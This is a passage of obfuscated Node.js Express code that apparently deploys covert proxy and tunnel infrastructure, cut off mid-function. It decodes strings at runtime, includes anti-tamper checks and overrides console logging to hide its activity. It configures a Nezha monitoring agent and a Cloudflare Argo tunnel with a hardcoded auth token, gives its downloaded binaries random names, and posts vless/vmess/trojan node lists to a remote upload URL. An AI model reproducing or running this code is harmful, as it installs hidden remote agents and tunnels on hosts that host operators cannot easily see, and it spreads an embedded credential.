_0x528275(_0x5a0518-0x100,_0xcc13b7-0x1d2,_0x5c3609,_0x5a0518- -0x364);}function _0x3ba918(_0x2d62df,_0x3ada15,_0x7867b5,_0x3727b6){return _0x1ae50a(_0x7867b5,_0x3727b6-0x6b,_0x7867b5-0x1ac,_0x3727b6-0x74);}const _0x13f4ff={'Cgxfy':function(_0x241287,_0x2cdcfd){return _0x18865f['WsblQ'](_0x241287,_0x2cdcfd);},'csseE':_0x18865f[_0x3ba918(0x2f5,0x3eb,0x3e4,0x28e)],'VaFin':_0x18865f[_0x3ba918(0x210,0x2a8,0x1a4,0x14d)],'DqnWQ':_0x18865f[_0x3ba918(0x193,0x30e,0x12d,0x22a)]};if(_0x18865f['tngER'](_0x18865f[_0x4481fe(-0x5a,-0x184,0x0,-0x55)],_0x18865f[_0x4481fe(-0x211,-0x281,-0x207,-0x2e1)]))_0xe6c042=_0x4481fe(0x4b,-0x4a,-0xba,-0xb2);else{const _0x8e6bcd=_0x5d2708?function(){function _0x1dbb4b(_0x833618,_0x57c926,_0x490fd1,_0x12a7b7){return _0x4481fe(_0x833618- -0x4e,_0x57c926-0x6f,_0x490fd1-0x2,_0x12a7b7);}function _0xcd0612(_0xcc762e,_0x1998be,_0x4de9e6,_0x44f113){return _0x4481fe(_0x4de9e6-0x194,_0x1998be-0x1b1,_0x4de9e6-0x5b,_0xcc762e);}if(_0x13f4ff[_0x1dbb4b(-0x1ec,-0x317,-0xf7,-0x2b2)](_0x13f4ff['csseE'],_0x13f4ff[_0x1dbb4b(-0x262,-0x251,-0x31d,-0x330)]))_0x431a8f=_0x25bad9;else{if(_0x5498c3){if(_0x13f4ff[_0x1dbb4b(-0x87,-0xa2,-0x11f,-0x58)]!==_0x13f4ff[_0xcd0612(0xed,0xc9,0x65,0x19f)]){const _0x5cf61c=_0x5498c3[_0x1dbb4b(-0xbc,0x71,0x6a,-0x1fe)](_0x43a64f,arguments);return _0x5498c3=null,_0x5cf61c;}else _0x5dfb10[_0xcd0612(0x1e3,0x273,0x1e5,0x1f8)](_0x4b96c8);}}}:function(){};return _0x5d2708=![],_0x8e6bcd;}};}()),_0x26c038=_0x16b6db(this,function(){function _0xdb4dff(_0x3ed092,_0x44959f,_0x56722a,_0x6e15b6){return _0x4971(_0x56722a- -0x1b7,_0x3ed092);}const _0x5c7933={};_0x5c7933[_0x1de8d5(-0xe,-0x8a,-0xe9,0x12d)]=_0xdb4dff(-0x16f,-0x98,-0x15,0x70)+'+$';function _0x1de8d5(_0x3e6024,_0x3ba7f2,_0x552712,_0x1d89db){return _0x4971(_0x3e6024- -0x28c,_0x3ba7f2);}const _0x503f86=_0x5c7933;return _0x26c038['toString']()['search'](_0x503f86[_0xdb4dff(0x21f,0x183,0xc7,0x10a)])[_0xdb4dff(0x19f,0xf5,0x6a,0x14f)]()[_0x1de8d5(0xc3,0x19e,0xa4,0xd0)+'r'](_0x26c038)[_0xdb4dff(0x2fd,0x1d5,0x204,0x15f)]('(((.+)+)+)'+'+$');});_0x26c038();const _0xae6de1=(function(){const _0x88d550={};_0x88d550[_0x336db4(0x834,0x76f,0x895,0x6cc)]=function(_0x890d92,_0x4ba062){return _0x890d92===_0x4ba062;},_0x88d550[_0x4ddbec(0x77d,0x8e1,0x783,0x640)]='HDNmw',_0x88d550[_0x4ddbec(0x682,0x7ce,0x6ad,0x6bd)]='pPIpW',_0x88d550['zXbmV']=function(_0x84c82f,_0x1a1d1a){return _0x84c82f===_0x1a1d1a;};function _0x4ddbec(_0x198c2d,_0x13bbfc,_0x28f1ff,_0xbe3ae8){return _0x4971(_0x28f1ff-0x3c4,_0x13bbfc);}_0x88d550['MSZMV']=_0x4ddbec(0x4ed,0x5d7,0x64f,0x79d),_0x88d550[_0x336db4(0x89d,0x7cf,0x90b,0x75a)]='guVso',_0x88d550[_0x4ddbec(0x4a4,0x5e4,0x5ee,0x4f5)]=_0x4ddbec(0x646,0x70c,0x74b,0x785)+_0x4ddbec(0x800,0x835,0x708,0x700)+_0x4ddbec(0x597,0x68a,0x617,0x507);const _0x2e550f=_0x88d550;let _0x321f9c=!![];function _0x336db4(_0x5f5c0b,_0x5e6d84,_0x27037a,_0x119363){return _0x4971(_0x5e6d84-0x3c1,_0x27037a);}return function(_0x436f83,_0x5b96ea){function _0x1d4d43(_0x5b3eca,_0x4ea3a0,_0x435833,_0x1a6019){return _0x336db4(_0x5b3eca-0x2d,_0x1a6019- -0x760,_0x4ea3a0,_0x1a6019-0x83);}const _0x574a46={};_0x574a46['BuZdz']=_0x2e550f[_0x1d4d43(-0x1d9,-0x4d,-0x4c,-0x175)];const _0x310ccb=_0x574a46,_0x5b3d3e=_0x321f9c?function(){function _0x16b41e(_0x29911e,_0x116af6,_0x7a6cd0,_0x3c2562){return _0x1d4d43(_0x29911e-0xbf,_0x3c2562,_0x7a6cd0-0x5b,_0x29911e- -0x2e);}function _0x407670(_0x32f2b2,_0x643e14,_0xcf1dff,_0x565644){return _0x1d4d43(_0x32f2b2-0x19a,_0x565644,_0xcf1dff-0x7a,_0x32f2b2-0x772);}if(_0x2e550f['cLKKx'](_0x2e550f[_0x407670(0x792,0x6c4,0x85a,0x66b)],_0x2e550f[_0x407670(0x6bc,0x6da,0x72a,0x54d)])){const _0x3cbd03=_0x2cb83c[_0x16b41e(-0xc6,-0x19b,-0x90,-0x71)](_0x431c73,arguments);return _0x3a055e=null,_0x3cbd03;}else{if(_0x5b96ea){if(_0x2e550f[_0x407670(0x5c6,0x71e,0x69f,0x601)](_0x2e550f[_0x16b41e(-0x1c1,-0x276,-0x25e,-0x2b8)],_0x2e550f[_0x407670(0x7e1,0x8bf,0x769,0x7c0)]))_0x11abbd['error'](_0x310ccb[_0x407670(0x613,0x5df,0x4ce,0x72d)],_0x79589f);else{const _0x36c782=_0x5b96ea[_0x407670(0x6da,0x5bc,0x5f7,0x6f1)](_0x436f83,arguments);return _0x5b96ea=null,_0x36c782;}}}}:function(){};return _0x321f9c=![],_0x5b3d3e;};}()),_0xd06f65=_0xae6de1(this,function(){const _0x1c07b0={'RDnvu':function(_0x3350cf,_0xbfaa54){return _0x3350cf(_0xbfaa54);},'SMocQ':function(_0x5f50aa,_0x2edb5c){return _0x5f50aa+_0x2edb5c;},'DNnre':_0x413040(-0x42,-0x6c,-0xcf,-0x1d1)+_0x4bf488(-0x102,-0x4f,-0x19c,-0x119),'sAsPx':_0x4bf488(0x140,-0x39,0x2b,0x104)+_0x413040(0x16e,0x11,-0xf,0x66)+_0x4bf488(-0xe5,-0x14e,-0x2a1,-0x1c0)+'\x20)','tAhJK':function(_0xbaafbf){return _0xbaafbf();},'JQtMo':_0x4bf488(0xc,-0x1ba,-0x120,-0x148),'WSnTb':_0x4bf488(-0x1b9,-0x236,-0x178,-0x101),'kTiAh':_0x4bf488(-0xa1,-0xea,-0x21b,-0x13e),'eFSuS':'error','qYtHX':_0x4bf488(-0x184,-0x9a,-0xdb,-0x89),'ayNPZ':_0x413040(-0x2d1,-0x179,-0xe5,-0x3b),'XYvFq':_0x4bf488(-0x141,-0x4c,-0x98,-0x2f),'ocOJh':function(_0x5ba591,_0x4c5409){return _0x5ba591<_0x4c5409;},'cIvLF':function(_0x488c94,_0x5b222f){return _0x488c94===_0x5b222f;},'cUDwA':_0x413040(-0x121,-0xba,-0x49,-0x17f)};function _0x4bf488(_0x32fbc7,_0x2c1a42,_0xdbe0e2,_0x4bf883){return _0x4971(_0x4bf883- -0x308,_0x2c1a42);}function _0x413040(_0x1f9e68,_0x16beab,_0x2127d8,_0x1b86af){return _0x4971(_0x16beab- -0x3d6,_0x1f9e68);}let _0x143193;try{const _0x1fd7b9=_0x1c07b0[_0x4bf488(0x16d,0x1a,-0xc3,0x92)](Function,_0x1c07b0[_0x413040(-0x2dc,-0x17f,-0xfd,-0x1e2)](_0x1c07b0[_0x413040(-0x163,-0x170,-0xa5,-0x14b)]+_0x1c07b0[_0x4bf488(-0x25,-0xf3,-0x104,-0xc4)],');'));_0x143193=_0x1c07b0['tAhJK'](_0x1fd7b9);}catch(_0x5092ed){_0x143193=window;}const _0x5a7977=_0x143193[_0x4bf488(-0x1e,-0x27,-0x90,0xcb)]=_0x143193[_0x4bf488(0xb3,-0xb,0xb0,0xcb)]||{},_0x4935c3=[_0x1c07b0[_0x413040(0xf9,-0x6b,-0x1b3,-0xac)],_0x1c07b0[_0x4bf488(-0x1b8,-0x22,-0x24b,-0x15c)],_0x1c07b0[_0x413040(-0x215,-0x28a,-0x362,-0x1e8)],_0x1c07b0['eFSuS'],_0x1c07b0[_0x413040(-0x178,-0x252,-0x13a,-0x22a)],_0x1c07b0[_0x4bf488(0x2f,0x4c,-0x1cc,-0x113)],_0x1c07b0[_0x4bf488(-0x143,-0x83,-0x169,-0x12d)]];for(let _0x28d17e=-0x5b1+-0x977*0x3+-0x2*-0x110b;_0x1c07b0[_0x4bf488(0x1b1,0x10b,-0x2,0x68)](_0x28d17e,_0x4935c3[_0x413040(-0x32,-0x2c,0x56,-0x185)]);_0x28d17e++){if(_0x1c07b0[_0x4bf488(-0x13b,0x91,0x134,0x6)](_0x1c07b0[_0x413040(-0x86,-0xb4,0x5c,-0x90)],_0x1c07b0[_0x4bf488(-0x107,0x39,-0x121,0x1a)])){const _0x4b746f=_0xae6de1[_0x4bf488(0x151,0x48,-0x36,0x47)+'r'][_0x413040(-0xfd,-0x1a4,-0x1c7,-0x34)]['bind'](_0xae6de1),_0x3654f6=_0x4935c3[_0x28d17e],_0x4ca521=_0x5a7977[_0x3654f6]||_0x4b746f;_0x4b746f[_0x413040(-0xc1,-0x16e,-0x113,-0xb)]=_0xae6de1[_0x413040(-0x10f,-0x10f,-0x8f,-0x17e)](_0xae6de1),_0x4b746f['toString']=_0x4ca521[_0x4bf488(-0xc7,0x8,0x72,-0xe7)][_0x413040(-0x26b,-0x10f,-0x10f,-0x27)](_0x4ca521),_0x5a7977[_0x3654f6]=_0x4b746f;}else _0x4ab25a[_0x4bf488(-0x173,-0x141,-0x98,-0x69)](_0x413040(-0x288,-0x159,-0x254,-0x82)+'g\x20error:\x20'+_0x5ecba3);}});function _0x388b12(_0xdcc24d,_0x199bdd,_0x5862f0,_0x337613){return _0x4971(_0x337613- -0x4a,_0xdcc24d);}_0xd06f65();function _0x4971(_0x3c8fd9,_0x54e807){const _0x28e1fc=_0x2c50();return _0x4971=function(_0x27144e,_0x4b8dfb){_0x27144e=_0x27144e-(-0x335*-0x1+-0x1293+0x1093);let _0xf1b382=_0x28e1fc[_0x27144e];if(_0x4971['DGfsIl']===undefined){var _0x26c9a4=function(_0x11289b){const _0x3f8a1e='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x237058='',_0x14c095='',_0x48f791=_0x237058+_0x26c9a4;for(let _0x1ac980=-0x16a4+-0x753+-0x3*-0x9fd,_0x35a1ed,_0x4d1d82,_0x5a2589=0x25c7+-0x1604+-0xfc3;_0x4d1d82=_0x11289b['charAt'](_0x5a2589++);~_0x4d1d82&&(_0x35a1ed=_0x1ac980%(0x1b37*-0x1+0x2545+-0x2*0x505)?_0x35a1ed*(0x215d+0x1*-0x1c71+0x5c*-0xd)+_0x4d1d82:_0x4d1d82,_0x1ac980++%(0x25b8+-0x14aa+-0x885*0x2))?_0x237058+=_0x48f791['charCodeAt'](_0x5a2589+(-0x251b+-0xf0+0x2615))-(-0xf8+0x251e+0x120e*-0x2)!==0x9e7+-0x2495+-0x1*-0x1aae?String['fromCharCode'](0x246*0x7+0xb*0xc5+-0x29*0x92&_0x35a1ed>>(-(0x543+0x1cea+-0x222b)*_0x1ac980&0x1464+-0x2d*-0x87+-0x2c19)):_0x1ac980:0xd4*-0x1d+-0x207b+0x387f){_0x4d1d82=_0x3f8a1e['indexOf'](_0x4d1d82);}for(let _0x2a5459=0x1*-0x7e2+-0x2c0*-0x7+-0xf*0xc2,_0x1c90bb=_0x237058['length'];_0x2a5459<_0x1c90bb;_0x2a5459++){_0x14c095+='%'+('00'+_0x237058['charCodeAt'](_0x2a5459)['toString'](0x927+0x1*0x18ad+-0x21c4))['slice'](-(-0x1101*-0x1+0x716*-0x1+-0x9e9));}return decodeURIComponent(_0x14c095);};_0x4971['psPenJ']=_0x26c9a4,_0x3c8fd9=arguments,_0x4971['DGfsIl']=!![];}const _0x230a51=_0x28e1fc[-0xb*-0x2fd+0xe*0x107+-0x2f41],_0x5e8795=_0x27144e+_0x230a51,_0x507ee8=_0x3c8fd9[_0x5e8795];if(!_0x507ee8){const _0x154838=function(_0xe59f5c){this['Nwtowb']=_0xe59f5c,this['bPsmbS']=[-0x129a+-0x1a83+0x339*0xe,0x6e9+-0x1c4c+-0x4b*-0x49,0x1d42+-0x7a*-0x1+-0x1dbc*0x1],this['bMGcIZ']=function(){return'newState';},this['aYyAUn']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['GUeCLU']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x154838['prototype']['mtKleJ']=function(){const _0xfc76d5=new RegExp(this['aYyAUn']+this['GUeCLU']),_0x7d3fd=_0xfc76d5['test'](this['bMGcIZ']['toString']())?--this['bPsmbS'][-0xf1+0xb*-0xbb+0x8fb]:--this['bPsmbS'][0xa13+-0x16*-0x1b5+-0x2fa1];return this['epviaP'](_0x7d3fd);},_0x154838['prototype']['epviaP']=function(_0x36f23b){if(!Boolean(~_0x36f23b))return _0x36f23b;return this['QFUbWY'](this['Nwtowb']);},_0x154838['prototype']['QFUbWY']=function(_0x51b87a){for(let _0x5bf27a=-0x8*0x431+0x809*0x1+0x1*0x197f,_0x1f9ae7=this['bPsmbS']['length'];_0x5bf27a<_0x1f9ae7;_0x5bf27a++){this['bPsmbS']['push'](Math['round'](Math['random']())),_0x1f9ae7=this['bPsmbS']['length'];}return _0x51b87a(this['bPsmbS'][0x52d*0x1+-0x1028+0xafb*0x1]);},new _0x154838(_0x4971)['mtKleJ'](),_0xf1b382=_0x4971['psPenJ'](_0xf1b382),_0x3c8fd9[_0x5e8795]=_0xf1b382;}else _0xf1b382=_0x507ee8;return _0xf1b382;},_0x4971(_0x3c8fd9,_0x54e807);}const express=require('express'),app=express(),axios=require('axios'),os=require('os'),fs=require('fs'),path=require(_0x4d5570(0x500,0x4bf,0x608,0x3c4)),{promisify}=require(_0x4d5570(0x4bd,0x4b7,0x395,0x361)),exec=promisify(require(_0x4d5570(0x56c,0x501,0x524,0x48d)+_0x388b12(0x379,0x1fc,0x2a1,0x30b))['exec']),{execSync}=require(_0x4d5570(0x49e,0x501,0x5a6,0x450)+_0x4d5570(0x49c,0x55d,0x672,0x5ba)),UPLOAD_URL=process[_0x4d5570(0x52c,0x48e,0x414,0x493)][_0x388b12(0x250,0x1b3,0x8d,0x167)]||'',PROJECT_URL=process['env']['PROJECT_UR'+'L']||'',AUTO_ACCESS=process[_0x4d5570(0x33f,0x48e,0x49d,0x580)][_0x388b12(0x329,0x2e6,0x384,0x3c8)+'S']||![],FILE_PATH=process['env'][_0x4d5570(0x3b8,0x358,0x23b,0x35b)]||_0x4d5570(0x32a,0x360,0x30d,0x429),SUB_PATH=process[_0x388b12(0x13c,0x23e,0x29f,0x23c)][_0x388b12(0x11,0x1ff,0x204,0x17f)]||_0x4d5570(0x6a4,0x5ca,0x4e7,0x5c6),PORT=process['env']['SERVER_POR'+'T']||process[_0x388b12(0x22a,0x370,0x246,0x23c)][_0x388b12(0x252,0x278,0x3d3,0x363)]||-0x2277+-0x1a33+0x4862,UUID=process[_0x4d5570(0x501,0x48e,0x3ba,0x4a1)][_0x4d5570(0x46c,0x3ae,0x2c4,0x370)]||'e9182e33-6'+_0x388b12(0xdd,0x21a,0x1c7,0x236)+_0x4d5570(0x3fb,0x436,0x562,0x312)+_0x4d5570(0x4ae,0x411,0x54e,0x56a),NEZHA_SERVER=process[_0x4d5570(0x439,0x48e,0x4b0,0x4c1)][_0x388b12(0x1d5,0x7,0x187,0x12f)+'ER']||'',NEZHA_PORT=process['env'][_0x4d5570(0x34b,0x3ab,0x26b,0x376)]||'',NEZHA_KEY=process['env'][_0x4d5570(0x249,0x384,0x403,0x294)]||'',ARGO_DOMAIN=process[_0x388b12(0x32d,0x194,0x130,0x23c)][_0x4d5570(0x4c5,0x412,0x430,0x2c6)+'N']||_0x388b12(0x14a,0x2de,0x3a2,0x272)+_0x388b12(0x347,0x28a,0x3c0,0x29b),ARGO_AUTH=process[_0x4d5570(0x4c8,0x48e,0x37d,0x4b8)][_0x388b12(0x4ce,0x2d9,0x2db,0x374)]||_0x388b12(0x94,0x6c,0x1ef,0x1d6)+_0x388b12(0x285,0x20c,0x2de,0x206)+'ZjAzNjM3OW'+'ViMTA4OWYy'+_0x4d5570(0x30b,0x42d,0x4b7,0x501)+'EiLCJ0Ijoi'+_0x4d5570(0x556,0x4b9,0x5ac,0x608)+_0x4d5570(0x3f6,0x43c,0x459,0x579)+_0x388b12(0x239,0x9c,0x1bf,0x103)+'AtMGY5ZTg4'+_0x4d5570(0x713,0x5d1,0x51c,0x56b)+_0x388b12(0x192,0x2ea,0x33d,0x29e)+_0x4d5570(0x3f2,0x4c5,0x45a,0x569)+_0x388b12(0x40d,0x449,0x421,0x36e)+_0x388b12(0x269,0xee,0x14c,0x124)+'xXRmhZMlF0'+'WkdRek9XVm'+_0x388b12(0x14e,0x1c1,0x3ff,0x291)+'bSJ9',ARGO_PORT=process[_0x388b12(0x13e,0x2cb,0x257,0x23c)][_0x388b12(0xdf,0xea,0x320,0x1be)]||0x149a+-0xb6f*-0x1+-0x1*0xc8,CFIP=process[_0x4d5570(0x5e5,0x48e,0x44a,0x43c)][_0x388b12(0x2b7,0x414,0x45b,0x35a)]||_0x388b12(0x13c,0x2d0,0xe1,0x224)+_0x388b12(0x429,0x350,0x235,0x2ec),CFPORT=process[_0x4d5570(0x43c,0x48e,0x337,0x575)][_0x388b12(0x3b4,0x35e,0x46b,0x3b4)]||0x12*0x137+-0x1002+0x421*-0x1,NAME=process['env']['NAME']||_0x4d5570(0x52a,0x404,0x517,0x4f8);!fs['existsSync'](FILE_PATH)?(fs[_0x388b12(0x42d,0x3c3,0x43f,0x3c1)](FILE_PATH),console['log'](FILE_PATH+(_0x388b12(0x2b,0x254,0x16f,0x11b)+'d'))):console[_0x4d5570(0x4c7,0x3c8,0x415,0x2a1)](FILE_PATH+(_0x388b12(0x28d,0x268,0x4c1,0x3aa)+_0x388b12(0x376,0x20e,0xfc,0x243)));function generateRandomName(){const _0x5c0bd4={};_0x5c0bd4[_0x5343ad(0x1e9,0x24a,0x2c2,0x1e4)]=_0x5343ad(0x3da,0x2ea,0x509,0x4d5)+_0x5343ad(0x2f8,0x3b8,0x374,0x466)+_0x5343ad(0x1e1,0x2a0,0x227,0x1c0),_0x5c0bd4[_0x1d9f6e(0x43d,0x39c,0x526,0x58f)]=function(_0x19d840,_0x4812ae){return _0x19d840!==_0x4812ae;},_0x5c0bd4[_0x1d9f6e(0x369,0x3c4,0x24d,0x26a)]=_0x5343ad(0x31d,0x39a,0x315,0x28a);const _0x3ffdd9=_0x5c0bd4,_0x579316=_0x3ffdd9[_0x5343ad(0x1e9,0x16d,0x1fb,0x107)];function _0x5343ad(_0x2a6f23,_0x3b1cb2,_0x6ab24,_0x2ae1b){return _0x4d5570(_0x2a6f23-0x10f,_0x2a6f23- -0x175,_0x6ab24-0x1e6,_0x3b1cb2);}let _0x36f15a='';function _0x1d9f6e(_0x15aa38,_0x5a7b10,_0x127b23,_0x59264d){return _0x388b12(_0x127b23,_0x5a7b10-0x3a,_0x127b23-0x16a,_0x15aa38-0x275);}for(let _0x4cdb30=0xd2b+0x2372+-0x13*0x28f;_0x4cdb30<0x13c0+0x53*-0xf+-0x2f9*0x5;_0x4cdb30++){if(_0x3ffdd9[_0x1d9f6e(0x43d,0x3cc,0x33e,0x33a)](_0x3ffdd9[_0x1d9f6e(0x369,0x2db,0x431,0x34d)],_0x1d9f6e(0x4b5,0x548,0x437,0x382)))return null;else _0x36f15a+=_0x579316['charAt'](Math[_0x1d9f6e(0x4a7,0x346,0x540,0x5bd)](Math[_0x1d9f6e(0x4d9,0x519,0x559,0x3a9)]()*_0x579316[_0x5343ad(0x43d,0x545,0x424,0x36b)]));}return _0x36f15a;}const npmName=generateRandomName(),webName=generateRandomName(),botName=generateRandomName(),phpName=generateRandomName();let npmPath=path[_0x388b12(0x2f6,0x1b6,0x44f,0x323)](FILE_PATH,npmName);function _0x4d5570(_0x3a8844,_0x415af2,_0x1ecdf6,_0x395285){return _0x4971(_0x415af2-0x208,_0x395285);}let phpPath=path['join'](FILE_PATH,phpName),webPath=path[_0x388b12(0x46e,0x3e7,0x2ff,0x323)](FILE_PATH,webName),botPath=path[_0x388b12(0x429,0x336,0x3aa,0x323)](FILE_PATH,botName),subPath=path[_0x388b12(0x474,0x2b4,0x223,0x323)](FILE_PATH,_0x4d5570(0x274,0x3ac,0x25b,0x3c8)),listPath=path[_0x388b12(0x1e0,0x375,0x44a,0x323)](FILE_PATH,_0x388b12(0x414,0x234,0x241,0x394)),bootLogPath=path[_0x388b12(0x233,0x39e,0x21c,0x323)](FILE_PATH,'boot.log'),configPath=path[_0x388b12(0x3dc,0x45a,0x207,0x323)](FILE_PATH,_0x388b12(0x109,0x2c9,0x1f1,0x276)+'n');function deleteNodes(){function _0x172a72(_0x2200ee,_0x94f545,_0x420f64,_0x35b217){return _0x388b12(_0x94f545,_0x94f545-0x1b6,_0x420f64-0x15b,_0x2200ee- -0xb2);}function _0x53f0ea(_0x11b996,_0x5c14dd,_0x33512d,_0x3bb3bf){return _0x388b12(_0x33512d,_0x5c14dd-0x1c8,_0x33512d-0x1c8,_0x3bb3bf-0x3f1);}const _0x389b59={};_0x389b59[_0x53f0ea(0x373,0x390,0x54c,0x4e0)]=_0x172a72(0x2a1,0x23d,0x2f9,0x195),_0x389b59[_0x172a72(0xa4,0x114,0x210,0x13c)]='ZToni',_0x389b59[_0x172a72(0x219,0x17e,0x2aa,0x240)]=_0x172a72(0x153,0x11a,0x1a1,0x109),_0x389b59[_0x172a72(0x1b1,0x160,0x2d1,0x176)]=_0x172a72(0x313,0x203,0x1ce,0x439),_0x389b59[_0x53f0ea(0x68a,0x651,0x71c,0x610)]=function(_0x81eac8,_0x4f04fa){return _0x81eac8===_0x4f04fa;},_0x389b59[_0x53f0ea(0x8cc,0x78d,0x6a1,0x777)]=_0x172a72(0x13a,0x21c,0x5a,0xb6)+'n/json';const _0x3f7b4d=_0x389b59;try{if(!UPLOAD_URL)return;if(!fs['existsSync'](subPath))return;let _0x2ed9c2;try{_0x2ed9c2=fs['readFileSy'+'nc'](subPath,_0x3f7b4d[_0x172a72(0x219,0x1f2,0x183,0x1c9)]);}catch{return null;}const _0x252f5f=Buffer['from'](_0x2ed9c2,_0x3f7b4d[_0x53f0ea(0x770,0x5ee,0x543,0x654)])['toString'](_0x3f7b4d['PXRJQ']),_0x275596=_0x252f5f['split']('\x0a')[_0x53f0ea(0x6c8,0x5f5,0x665,0x6ac)](_0x58188f=>/(vless|vmess|trojan|hysteria2|tuic):\/\//['test'](_0x58188f));if(_0x3f7b4d[_0x53f0ea(0x4a1,0x5f7,0x60e,0x610)](_0x275596[_0x53f0ea(0x6b9,0x8bc,0x8ae,0x751)],0x1*-0x1ed0+0xc20+0x958*0x2))return;const _0x11e00d={};_0x11e00d['nodes']=_0x275596;const _0x1310b3={};_0x1310b3[_0x53f0ea(0x890,0x819,0x759,0x733)+'pe']=_0x3f7b4d['robLg'];const _0x4b56c7={};return _0x4b56c7[_0x53f0ea(0x84a,0x64c,0x7f1,0x7ae)]=_0x1310b3,axios['post'](UPLOAD_URL+(_0x172a72(0xd3,-0x37,0x1d1,0x31)+_0x53f0ea(0x49c,0x5f9,0x6b5,0x591)),JSON[_0x53f0ea(0x778,0x850,0x71c,0x7b1)](_0x11e00d),_0x4b56c7)[_0x172a72(0x2cc,0x17b,0x2df,0x39e)](_0x3e5e76=>{function _0x4019cf(_0x4ce52a,_0x3a549f,_0x4f015e,_0x3569d0){return _0x53f0ea(_0x4ce52a-0xd3,_0x3a549f-0xa0,_0x3a549f,_0x3569d0- -0x12c);}if(_0x3f7b4d['FZUXE']!==_0x3f7b4d[_0x4019cf(0x42c,0x3e4,0x2c2,0x41b)])return null;else{const _0x533815=_0x289fa3?function(){function _0x127fe0(_0x50091e,_0x3bab97,_0x4d308c,_0x25b7e6){return _0x4019cf(_0x50091e-0x39,_0x25b7e6,_0x4d308c-0x1d0,_0x3bab97- -0x222);}if(_0x5c0e12){const _0xc6b28e=_0x8fcbbd[_0x127fe0(0x3cc,0x360,0x485,0x269)](_0x1f4c76,arguments);return _0x4128cc=null,_0xc6b28e;}}:function(){};return _0x361aaa=![],_0x533815;}}),null;}catch(_0x2cca50){return null;}}function cleanupOldFiles(){function _0x9b1e82(_0x1998a4,_0x307e32,_0x39d211,_0xe5befa){return _0x388b12(_0x39d211,_0x307e32-0x1e5,_0x39d211-0x152,_0x307e32- -0xfa);}const _0x6612b={};_0x6612b['GtEBI']=function(_0x1b20dc,_0x26d0d0){return _0x1b20dc*_0x26d0d0;},_0x6612b['YuFPT']=function(_0x2075b0,_0x87ea38){return _0x2075b0===_0x87ea38;},_0x6612b[_0x5290c2(-0x19a,-0x11b,-0x196,-0x18f)]=_0x9b1e82(0x149,0x96,0x137,0x13c),_0x6612b['KLYzj']=_0x5290c2(-0x2c2,-0x281,-0x2b8,-0x202);function _0x5290c2(_0x12556a,_0x43264d,_0x4577eb,_0xf3a98d){return _0x4d5570(_0x12556a-0x197,_0xf3a98d- -0x58b,_0x4577eb-0x1ab,_0x12556a);}_0x6612b[_0x9b1e82(0xba,0x189,0x185,0x1a1)]=function(_0xbd0d2a,_0x1d73a4){return _0xbd0d2a!==_0x1d73a4;},_0x6612b[_0x5290c2(-0x32a,-0xc8,-0x1a7,-0x206)]=_0x9b1e82(-0x2a,0x30,0xc5,0x43);const _0x13906c=_0x6612b;try{if(_0x13906c[_0x9b1e82(0xcc,0x189,0x1f0,0x1d6)](_0x13906c[_0x5290c2(-0x18f,-0xc2,-0x17d,-0x206)],_0x13906c['LEPGy']))_0x57fd5c+=_0x4f1b3b[_0x5290c2(-0x341,-0x19a,-0x125,-0x1de)](_0x14f3b5['floor'](_0x13906c['GtEBI'](_0x5d0c3f[_0x5290c2(-0x1e0,-0x7c,-0x197,-0xd5)](),_0x345d91[_0x5290c2(0xca,0x145,-0x49,0x27)])));else{const _0x5ab057=fs[_0x9b1e82(0x33,0x181,0x1c3,0x1bc)+'c'](FILE_PATH);_0x5ab057['forEach'](_0x2105ef=>{function _0x2e0ef3(_0x4638b7,_0x4f4a52,_0x5dfdd6,_0x8fd6ec){return _0x5290c2(_0x4f4a52,_0x4f4a52-0x1e5,_0x5dfdd6-0x6,_0x4638b7-0x210);}function _0xf04ed1(_0x36f75f,_0x54acf9,_0x495b9c,_0x4cc4c2){return _0x9b1e82(_0x36f75f-0x4b,_0x54acf9-0x50f,_0x36f75f,_0x4cc4c2-0xaf);}if(_0xf04ed1(0x5ef,0x527,0x5c6,0x62b)!==_0x13906c[_0x2e0ef3(0x81,0x8e,0xc0,0x188)]){const _0x54591e=path[_0xf04ed1(0x6e9,0x738,0x605,0x7c4)](FILE_PATH,_0x2105ef);try{if(_0x13906c[_0xf04ed1(0x4c1,0x592,0x5bd,0x557)](_0x13906c[_0xf04ed1(0x534,0x68d,0x634,0x731)],_0x13906c['KLYzj'])){const _0x47592a=fs[_0xf04ed1(0x665,0x652,0x5c7,0x54f)](_0x54591e);_0x47592a[_0xf04ed1(0x50e,0x614,0x63d,0x71f)]()&&fs[_0xf04ed1(0x7aa,0x6d4,0x7f4,0x821)](_0x54591e);}else{if(_0x4560f2[_0xf04ed1(0x4d2,0x5f7,0x48b,0x72c)]){if(_0x13906c['YuFPT'](_0x51370f[_0x2e0ef3(0xb9,0x13a,0x78,0x191)][_0xf04ed1(0x75c,0x67e,0x658,0x772)],-0x5ce+-0x38f*0x3+0x120b*0x1)){}}}}catch(_0x4ce006){}}else _0x19632d?_0x225add[_0xf04ed1(0x620,0x66a,0x6a0,0x553)]('Empowermen'+_0xf04ed1(0x67e,0x6c2,0x7ab,0x5d2)+'or\x20'+_0x429290+':\x20'+_0x45bb79):_0x2b7be1[_0x2e0ef3(0x4d,0x132,0xab,-0x9)](_0xf04ed1(0x47e,0x543,0x4d4,0x6a5)+_0xf04ed1(0x83b,0x7ce,0x832,0x689)+_0xf04ed1(0x6f0,0x6a7,0x805,0x76c)+_0x229293+':\x20'+_0x576583['toString'](-0x5*-0x3ee+-0xa17+-0x987));});}}catch(_0x4c7fe0){}}app[_0x4d5570(0x3e4,0x36a,0x24f,0x35f)]('/',function(_0x315e27,_0x18d4c0){const _0x92c1ff={};function _0x360c91(_0x14d650,_0x30a04a,_0x13b175,_0x2851e4){return _0x4d5570(_0x14d650-0x36,_0x2851e4- -0x485,_0x13b175-0x1e3,_0x14d650);}_0x92c1ff[_0x363f90(0x300,0x2b4,0x257,0x2cd)]=_0x363f90(0x289,0x180,0x1f5,0x2a4)+'d!';function _0x363f90(_0x1e5547,_0x3d535e,_0x59dc77,_0x7e2370){return _0x388b12(_0x3d535e,_0x3d535e-0x13e,_0x59dc77-0x111,_0x7e2370-0x132);}const _0x5d3ae8=_0x92c1ff;_0x18d4c0[_0x363f90(0x2b6,0x16d,0x27b,0x2b4)](_0x5d3ae8[_0x360c91(0xd7,0x8e,-0x1e0,-0x98)]);});async function generateConfig(){const 